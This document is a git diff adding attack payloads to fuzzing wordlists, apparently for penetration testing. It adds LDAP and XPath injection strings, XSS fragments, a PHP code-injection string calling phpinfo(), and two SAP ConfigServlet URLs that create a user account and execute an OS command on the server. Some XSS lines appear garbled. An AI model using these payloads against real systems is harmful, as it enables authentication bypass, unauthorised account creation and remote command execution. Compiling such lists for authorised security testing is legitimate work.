diff --git a/Fuzzing/LDAP_FUZZ.txt b/Fuzzing/LDAP_FUZZ.txt
new file mode 100644
index 00000000..d84ea8cd
--- /dev/null
+++ b/Fuzzing/LDAP_FUZZ.txt
@@ -0,0 +1,26 @@
+!
+%21
+%26
+%28
+%29
+%2A%28%7C%28mail%3D%2A%29%29
+%2A%28%7C%28objectclass%3D%2A%29%29
+%2A%7C
+%7C
+&
+(
+)
+*(|(mail=*))
+*(|(objectclass=*))
+*/*
+*|
+/
+//
+//*
+@*
+x' or name()='username' or 'x'='y
+|
+*()|&'
+admin*
+admin*)((|userpassword=*)
+*)(uid=*))(|(uid=*
diff --git a/Fuzzing/XML_FUZZ b/Fuzzing/XML_FUZZ
index c2223acc..411cf60c 100644
--- a/Fuzzing/XML_FUZZ
+++ b/Fuzzing/XML_FUZZ
@@ -11,6 +11,11 @@
]>
]>
+"]]>"
+"
cript:alert('XSS')"">"
+""
+"XSS"
+','')); phpinfo(); exit;/*
## Element and Attrib Values
@@ -48,3 +53,13 @@ false
{{Tnn96}}
{= Tnn96}
{{= Tnn96}}
+' or '1'='1
+' or ''='
+x' or 1=1 or 'x'='y
+/
+//
+//*
+*/*
+@*
+count(/child::node())
+x' or name()='username' or 'x'='y
diff --git a/vulns/sap.txt b/vulns/sap.txt
index b46b1865..1d146308 100755
--- a/vulns/sap.txt
+++ b/vulns/sap.txt
@@ -92,6 +92,8 @@ caf
ccsui
com~tc~lm~webadmin~httpprovider~web
ctc
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
dispatcher
dswsbobje
dtr_lite